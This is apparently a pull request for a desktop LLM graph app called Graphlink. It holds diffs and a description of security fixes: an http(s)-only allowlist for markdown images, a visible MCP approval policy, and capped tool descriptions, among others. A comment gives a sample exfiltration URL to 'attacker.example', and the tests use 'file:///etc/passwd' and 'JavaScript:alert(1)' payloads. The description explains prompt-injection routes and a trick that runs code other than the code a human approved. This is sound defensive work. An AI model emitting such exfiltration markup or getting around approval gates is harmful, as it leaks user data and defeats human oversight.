+      const { container } = render(<NodeMarkdown content="![x](file:///etc/passwd)" />);
+      expect(container.querySelector("img")).toBeNull();
+    });
+
+    it("renders nothing for a mixed/upper-case dangerous scheme, exactly like the lowercase form", () => {
+      const { container } = render(<NodeMarkdown content="![x](JavaScript:alert(1))" />);
+      expect(container.querySelector("img")).toBeNull();
+    });
   });
 
   describe("LaTeX math (node redesign, stage 4)", () => {

--- a/web_ui/src/app/canvas/NodeMarkdown.tsx
+++ b/web_ui/src/app/canvas/NodeMarkdown.tsx
@@ -177,16 +177,44 @@ function TableWrapper({ node: _node, ...props }: JSX.IntrinsicElements["table"] 
   );
 }
 
-function ZoomImage({ node: _node, alt, ...props }: JSX.IntrinsicElements["img"] & ExtraProps) {
+function ZoomImage({ node: _node, alt, src, ...props }: JSX.IntrinsicElements["img"] & ExtraProps) {
   // alt comes from the markdown source itself (`![alt](url)`) via
   // react-markdown's own parsing - pass it through explicitly rather than
   // relying on the `{...props}` spread, which satisfies jsx-a11y/alt-text
   // (a spread alone isn't statically verifiable) while keeping the real
   // author-provided text. Empty alt is a legitimate markdown state
   // (`![](url)`), not a suppression - falls back to "" rather than undefined.
+  //
+  // SECURITY-FIX (markdown-image-exfil): mirrors SafeAnchor's own scheme
+  // check just below, applied to `src` instead of `href`. Unlike a link,
+  // the browser fetches an `<img src>` at RENDER TIME with no click
+  // required - so LLM/web-authored markdown (every node kind renders
+  // content that can carry a prompt injection; this is not WebResearch-
+  // specific) that steers the model into emitting
+  // `![](https://attacker.example/x?leak=<data>)` gets a silent,
+  // automatic GET the moment the node renders, including mid-stream. The
+  // same explicit http(s)-only allowlist SafeAnchor uses (rather than
+  // trusting react-markdown's own default urlTransform to keep stripping
+  // javascript:/data:/file: forever) rejects a non-http(s) `src` by
+  // rendering nothing, the same "omit it entirely" choice SafeAnchor makes
+  // for a bad href. This does NOT block arbitrary http(s) hosts - most
+  // markdown images ARE legitimate external images, and that half of the
+  // gap (an attacker-controlled but syntactically-safe https host) is
+  // instead closed at the network layer by backend/app.py's img-src CSP,
+  // which restricts actual image fetches to this app's own origin.
+  const isHttpUrl = !!src && /^https?:\/\//i.test(src.trim());
+  if (!isHttpUrl) {
+    return null;
+  }
   return (
     <Zoom wrapElement="span">
-      <img alt={alt ?? ""} {...props} />
+      {/* referrerPolicy="no-referrer": defense-in-depth alongside the CSP
+          above, matching SafeAnchor's own rel="noreferrer" precedent for
+          the identical concern on <a> - never hand the image host this
+          app's own URL as a Referer. `{...props}` spread first, `src`/
+          referrerPolicy explicit and last, so nothing upstream can
+          silently override the two attributes this check governs. */}
+      <img alt={alt ?? ""} {...props} src={src} referrerPolicy="no-referrer" />
     </Zoom>
   );
 }

--- a/web_ui/src/app/chrome/SettingsDialog.test.tsx
+++ b/web_ui/src/app/chrome/SettingsDialog.test.tsx
@@ -949,6 +949,43 @@ describe("SettingsDialog", () => {
       expect(screen.getByRole("checkbox")).toBeChecked();
     });
 
+    // SECURITY-FIX (mcp-approval-auto-invisible-in-settings-ui): before this
+    // fix, a server's approval policy (backend/tools.py's ApprovalPolicy -
+    // "auto" runs a server's tools with NO human confirmation in either
+    // Builder mode) had no visible control surface on this page at all.
+    // These two tests prove the fix closes that: an "auto" server renders
+    // visibly AND distinctly (a dedicated class, not just different text)
+    // from an "always" server, so the two are genuinely distinguishable to
+    // someone glancing at the page.
+    it("renders an approval=\"auto\" server's policy visibly, styled as the risky state", async () => {
+      const autoServer = { ...fsServer, id: "auto-id", approval: "auto" };
+      const { user, push } = setup();
+      await goToMcpServers(user, push, { mcpServers: [autoServer] });
+
+      const approvalText = screen.getByText("Approval: Auto (no confirmation)");
+      expect(approvalText).toBeInTheDocument();
+      expect(approvalText).toHaveClass("settings-mcp-server-approval-auto");
+    });
+
+    it("renders an approval=\"always\" server's policy distinctly from the auto case", async () => {
+      const { user, push } = setup();
+      await goToMcpServers(user, push, { mcpServers: [fsServer] });
+
+      const approvalText = screen.getByText("Approval: Always confirm");
+      expect(approvalText).toBeInTheDocument();
+      expect(approvalText).not.toHaveClass("settings-mcp-server-approval-auto");
+      expect(screen.queryByText("Approval: Auto (no confirmation)")).not.toBeInTheDocument();
+    });
+
+    it("shows a server's granted scopes, or a placeholder when none are declared", async () => {
+      const scopedServer = { ...fsServer, id: "scoped-id", scopes: ["graph.read", "graph.mutate"] };
+      const { user, push } = setup();
+      await goToMcpServers(user, push, { mcpServers: [scopedServer, fsServer] });
+
+      expect(screen.getByText("Scopes: graph.read, graph.mutate")).toBeInTheDocument();
+      expect(screen.getByText("Scopes: No declared scopes")).toBeInTheDocument();
+    });
+
     it("unchecking a server's enabled toggle fires setMcpServers with the full array, that entry flipped", async () => {
       const { user, push, intents } = setup();
       await goToMcpServers(user, push, { mcpServers: [fsServer] });

--- a/web_ui/src/app/chrome/SettingsDialog.tsx
+++ b/web_ui/src/app/chrome/SettingsDialog.tsx
@@ -1081,6 +1081,19 @@ export function parseEnvLines(text: string): Record<string, string> {
   return env;
 }
 
+// SECURITY-FIX (mcp-approval-auto-invisible-in-settings-ui): human-readable
+// labels for ToolRegistry's own three-value approval vocabulary
+// (backend/tools.py's ApprovalPolicy = Literal["auto", "once", "always"] /
+// _KNOWN_APPROVAL_POLICIES) - see the render site below for why this page
+// shows the value at all. Falls back to the raw wire string for anything
+// outside that set (defensive only; the backend rejects unknown policies
+// at registration time, so this page should never actually see one).
+const MCP_APPROVAL_LABELS: Record<string, string> = {
+  auto: "Auto (no confirmation)",
+  once: "Confirm once",
+  always: "Always confirm",
+};
+
 function McpServersPage({ state, transport }: { state: AppSettingsState; transport: WsTransport }) {
   const [draftName, setDraftName] = useState("");
   const [draftCommand, setDraftCommand] = useState("");
@@ -1189,6 +1202,52 @@ function McpServersPage({ state, transport }: { state: AppSettingsState; transpo
                     env: {[...server.envKeys].sort().join(", ")}
                   </span>
                 )}
+                {/* SECURITY-FIX (mcp-approval-auto-invisible-in-settings-ui):
+                    before this line, this row showed only name/command/
+                    args/env - a server whose config carries approval="auto"
+                    (settable via a hand-edited or imported session.dat; see
+                    this codebase's own "hostile data on disk" threat
+                    boundary) has its tools run with NO human confirmation
+                    in either Builder mode (backend/tools.py's ToolRegistry.
+                    invoke gates on `registration.approval != "auto"` -
+                    "auto" is the one policy that skips request_approval
+                    entirely), and there was no control surface here a user
+                    would think to check for it. Read-only display, not an
+                    editable control: the gap this closes is the value being
+                    INVISIBLE, not being un-settable, and this page's own
+                    edit-in-place mutations (the enabled checkbox above,
+                    Remove) are the only two established here - reusing that
+                    same bulk-replace `updateServers` path for a security-
+                    relevant field risked a confused-click flipping
+                    "always"->"auto" as a bigger, less-certain change than
+                    this pass calls for. Always rendered (unlike the
+                    conditional env line above) because the whole point is
+                    that this must never be easy to miss. "auto" additionally
+                    gets a distinct color - the same --gl-semantic-status-
+                    warning token .plan-node-approval already uses for its
+                    own approval-needed banner - so the one policy that
+                    skips confirmation reads as visually different from the
+                    two that don't, not just differently worded. */}
+                <span
+                  className={
+                    server.approval === "auto"
+                      ? "settings-mcp-server-command settings-mcp-server-approval-auto"
+                      : "settings-mcp-server-command"
+                  }
+                >
+                  Approval: {MCP_APPROVAL_LABELS[server.approval] ?? server.approval}
+                </span>
+                {/* SECURITY-FIX (mcp-approval-auto-invisible-in-settings-ui):
+                    same visibility gap as `approval` above, for the granted
+                    `scopes` list. Purely informational, matching
+                    PluginsPage's own established stance a few dozen lines
+                    down ("no per-scope editing UI - MCP Servers itself has
+                    never had one for its own `scopes` field") - scopes are
+                    what a server's config declares it was granted, not a
+                    per-tool pick a user makes here. */}
+                <span className="settings-mcp-server-command">
+                  Scopes: {server.scopes.length > 0 ? server.scopes.join(", ") : "No declared scopes"}
+                </span>
               </span>
             </label>
             <button

--- a/web_ui/src/app/styles.css
+++ b/web_ui/src/app/styles.css
@@ -4815,6 +4815,15 @@ mark.document-view-search-match-current {
   flex-shrink: 0;
 }
 
+/* SECURITY-FIX (mcp-approval-auto-invisible-in-settings-ui): the one
+   approval policy that skips confirmation entirely (backend/tools.py's
+   ApprovalPolicy "auto") reads as visually distinct from "once"/"always",
+   not just differently worded - same --gl-semantic-status-warning token
+   .plan-node-approval already uses for its own approval-needed banner. */
+.settings-mcp-server-approval-auto {
+  color: var(--gl-semantic-status-warning, currentColor);
+}
+
 .settings-fieldset {
   display: flex;
   flex-direction: column;


### PR DESCRIPTION
## Problem

Continuation of the security/vulnerability audit started in #345 - the remaining findings from an 18-agent adversarial scan (51 raw findings; #345 closed 17). Each finding below was reproduced against the actual code and fixed with a regression test confirmed to fail on the pre-fix code (revert-verified via file copies, never git stash).

## Fixes

- **WS/events robustness**: a non-string `subscribe` topic, and a non-list `args` value for any unschema'd intent, both crashed the whole WebSocket connection instead of returning a graceful error.
- **Chat load hardening**: a non-hashable `node_type` in a saved chat aborted the entire load; a malformed numeric column in the `graphs` table crashed `get_all_chats`.
- **MCP client hardening**: tool results, stdout/stderr lines, and JSON-RPC error messages from a hostile/misbehaving MCP server were all unbounded, risking unbounded memory growth and a wedged reader thread.
- **MCP registry cache invalidation**: disabling or editing an MCP server in Settings had no effect on a Builder session that had already started - the cached tool registry (and its connected client) kept using the old config for the rest of the session.
- **Boot-time crash**: a corrupted/hand-edited `log_level` setting crashed the app before any exception handler was installed.
- **Knowledge search**: FTS5 query cost was unbounded (a large query could burn CPU for minutes); `globalSearch` silently created a knowledge-store collection row for any integer `workspaceId`, even one that never existed.
- **LLM knowledge tool scoping**: `knowledge.search` (the Builder-facing tool) accepted an arbitrary `collection_id`, letting a prompt-injected model read every workspace's indexed content regardless of the session's own workspace.
- **Scratch-dir root ownership**: the shared parent directory for Py-Coder/Sandbox scratch dirs was never ownership-checked, so a local user who pre-created it could redirect a node's working directory via a rename/symlink race.
- **Archive import**: no aggregate size cap on a `.graphlink` archive's declared uncompressed content, only a per-member cap - a decompression-bomb-shaped DoS once import is wired to a real intent.
- **Stored API key exfiltration**: `loadApiModels` fell back to the DPAPI-protected stored key whenever the request's own key field was blank, with no check that the request's `base_url` matched what the key was saved against - any WS caller could redirect the decrypted key to an arbitrary host.
- **GitHub token exfiltration**: the token was attached to any URL a GitHub API response body named (`download_url`), not just the real GitHub hosts - a tampered/hostile response could redirect it.
- **Native dialog thread starvation**: file/folder pickers ran on the shared default asyncio executor, the same pool ~177 other backend operations depend on; a token holder opening enough dialogs could starve autosave and settings persistence.
- **Stored SVG XSS**: the asset-serving allowlist admitted `image/svg+xml` with no `nosniff`/`Content-Disposition`, a latent same-origin script-execution primitive for a hostile saved chat or imported archive.
- **Log/diagnostic file permissions**: `graphlink.log`, `faulthandler.log`, and diagnostic bundles were the one class of `~/.graphlink` file never chmod'ed to 0600 on POSIX, unlike settings/chat/knowledge/asset files.
- **CI/packaging hygiene**: CI's own verification tooling was installed unpinned from PyPI at run time; the built wheel shipped the entire test/eval source tree.
- **Web-research slow-drip DoS**: a hostile site dripping bytes just under the per-recv timeout could stall a fetch for hours instead of the intended ~30s budget, ignoring both the timeout and the Stop button.
- **Py-Coder approval-gate bypass**: `graph.set_node_content` could rewrite a Py-Coder node's displayed code while it was parked at its human-approval gate, so the approval panel showed one program while a different one executed.
- **Debug-level log content leak**: enabling DEBUG logging raised the root logger for the openai/anthropic SDKs too, persisting full chat transcripts (request bodies) into `graphlink.log` - the file this app's own bug-report flow tells users to attach.

## Test plan
- [x] Every fix has a regression test confirmed to fail against the pre-fix code (file-copy revert, not git stash)
- [x] `python -m ruff check .` clean on every touched file
- [x] Full relevant test suites green after each fix
- **Py-Coder approval-gate bypass (PYC-1)**: `graph.set_node_content` could rewrite a Py-Coder node's displayed code while it was parked at its human-approval gate, so the approval panel showed one program while a different one executed. Now refused when a run is in flight.
- **Debug-level log content leak (OBS-1)**: enabling DEBUG logging raised the root logger for the openai/anthropic SDKs too, persisting full chat transcripts (request bodies) into `graphlink.log` — the file the app's own bug-report flow tells users to attach. Those loggers are now capped to INFO.
- **HTML preview token leak**: the HTML node's sandboxed `srcdoc` iframe could read the live capability token via `document.baseURI` (the inherited fallback base URL carried the `#token=` fragment). Now frozen to an inert `<base>`.
- **Skip-link token clobber**: activating the accessibility skip link overwrote the URL fragment carrying the capability token, silently breaking auth for the rest of the window's life. Now a button that moves focus without touching the fragment.
- **Markdown image auto-load exfil**: LLM/web-authored markdown rendered `<img>` with an unrestricted external `src` and no `img-src` CSP, a silent no-click data-exfiltration channel. Now a scheme allowlist plus an `img-src` CSP header.

- **MCP tool-description injection cap**: an untrusted MCP server's tool `description`/`inputSchema` were forwarded uncapped and untyped into the model's tool definitions every Builder turn. Now length-capped and dict-validated.
- **MCP approval mode invisible in Settings**: the MCP Servers page never showed a server's `approval` policy, so an `approval="auto"` server (which skips all human confirmation) ran silently un-gated. Now shown per server, with `auto` visually flagged.
